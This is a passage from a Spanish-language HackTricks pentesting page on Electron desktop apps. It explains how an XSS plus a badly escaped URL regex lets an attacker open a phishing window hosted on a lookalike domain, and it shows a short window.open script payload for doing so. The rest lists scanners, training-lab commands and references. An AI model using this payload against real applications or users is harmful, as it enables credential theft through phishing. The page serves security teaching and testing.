			`Supongamos que encontraste un XSS pero no puedes activar RCE ni robar archivos internos, podrías intentar usarlo para robar credenciales mediante phishing.`

			`En primer lugar, necesitas saber qué sucede cuando intentas abrir una nueva URL, verificando el código JS en el front-end:`
			```javascript
			`webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)`
			`webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)`
			```
			La llamada a `openInternally` decidirá si el enlace se abrirá en la ventana del escritorio como un enlace perteneciente a la plataforma, o si se abrirá en el navegador como un recurso de terceros.

			`En caso de que la expresión regular utilizada por la función sea vulnerable a bypasses (por ejemplo, al no escapar los puntos de los subdominios), un atacante podría abusar del XSS para abrir una nueva ventana que se ubicará en la infraestructura del atacante solicitando credenciales al usuario:`
			```html
			`<script>`
			`window.open("<http://subdomainagoogleq.com/index.html>")`
			`</script>`
			```
			`## Herramientas`

			`* [Electronegativity](https://github.com/doyensec/electronegativity) es una herramienta para identificar configuraciones incorrectas y patrones de seguridad en aplicaciones basadas en Electron.`
			`* [Electrolint](https://github.com/ksdmitrieva/electrolint) es un complemento de código abierto para VS Code para aplicaciones de Electron que utiliza Electronegativity.`
			`* [nodejsscan](https://github.com/ajinabraham/nodejsscan) para verificar bibliotecas de terceros vulnerables.`
			`* [Electro.ng](https://electro.ng/): Necesitas comprarlo.`

			`## Laboratorios`

			`En [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) puedes encontrar un laboratorio para explotar aplicaciones vulnerables de Electron.`

			`Algunos comandos que te ayudarán con el laboratorio:`
			```bash
			`# Download apps from these URls`
			`# Vuln to nodeIntegration`
			`https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable1.zip`
			`# Vuln to contextIsolation via preload script`
			`https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable2.zip`
			`# Vuln to IPC Rce`
			`https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable3.zip`

			`# Get inside the electron app and check for vulnerabilities`
			`npm audit`

			`# How to use electronegativity`
			`npm install @doyensec/electronegativity -g`
			`electronegativity -i vulnerable1`

			`# Run an application from source code`
			`npm install -g electron`
			`cd vulnerable1`
			`npm install`
			`npm start`
			```
			`## Referencias`

			`* [https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028](https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028)`
			`* [https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)`
			`* [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8)`
			`* [https://www.youtube.com/watch?v=a-YnG3Mx-Tg](https://www.youtube.com/watch?v=a-YnG3Mx-Tg)`
			`* [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s)`
			`* Más investigaciones y artículos sobre la seguridad de Electron en [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)`
			`* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Obtén el [swag oficial de PEASS y HackTricks](https://peass.creator-spring.com)`
			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`